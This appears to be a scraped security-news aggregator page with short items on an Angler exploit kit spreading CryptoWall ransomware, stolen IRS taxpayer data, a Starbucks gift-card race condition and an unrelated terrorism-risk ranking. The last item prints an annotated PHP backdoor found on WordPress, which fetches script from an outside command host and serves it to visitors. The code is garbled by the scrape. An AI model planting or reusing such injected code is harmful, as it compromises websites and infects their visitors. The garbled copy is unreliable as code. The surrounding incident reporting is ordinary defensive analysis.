Varanoid.com

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th)

Introduction

In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB

On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1].

Terrorist Risks by City, According to Actual Data

I don’t know enough about the methodology to judge it, but it’s interesting: In total, 64 cities are categorised as ‘extreme risk’ in Verisk Maplecroft’s new Global Alerts Dashboard (GAD), an online mapping and data portal that logs and analyses every reported terrorism incident down to levels of 100m² worldwide. Based on the intensity and frequency of attacks in the 12 months following February 2014, combined with the number and severity of incidents in the previous five years, six cities in Iraq top the ranking. Over this period, the country’s capital, Baghdad, suffered 380 terrorist attacks resulting in 1141 deaths and 3654 wounded, making it the world’s highest risk urban centre, followed by Mosul, Al Ramadi, Ba’qubah, Kirkuk and Al Hillah

IRS: Crooks Stole Data on 100K Taxpayers Via ‘Get Transcript’ Feature

In March 2015, KrebsOnSecurity broke the news that identity thieves engaged in filing fraudulent tax refund requests with the Internal Revenue Service (IRS) were using the IRS’s own Web site to pull taxpayer data needed to complete the phony requests. Today, IRS Commissioner John Koskinen acknowledged that crooks used this feature to pull sensitive data on more than 100,000 taxpayers this year

Race Condition Exploit in Starbucks Gift Cards

A researcher was able to steal money from Starbucks by exploiting a race condition in their gift-card value-transfer protocol. Basically, by initiating two identical web transfers at once, he was able to trick the system into recording them both. Normally, you could take a $5 gift card and move that money to another $5 gift card, leaving you with an empty gift card and a $10 gift card

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

#2b8008#
/* turn off error reporting */ @ini_set(display_errors
/* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT
/* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) {
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent] $wp_mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua=
# check if we have the curl extension installed if (function_exists(curl_init) function_exists(curl_exec
# if we don't have curl, try file_get_contents which requires allow_url_fopen. elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen
# or try fopen as a last resort elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}} if (substr($wp_8610mezd,1,3) === scr
# The data retrieved will be echoed back to the user if it starts with the string scr.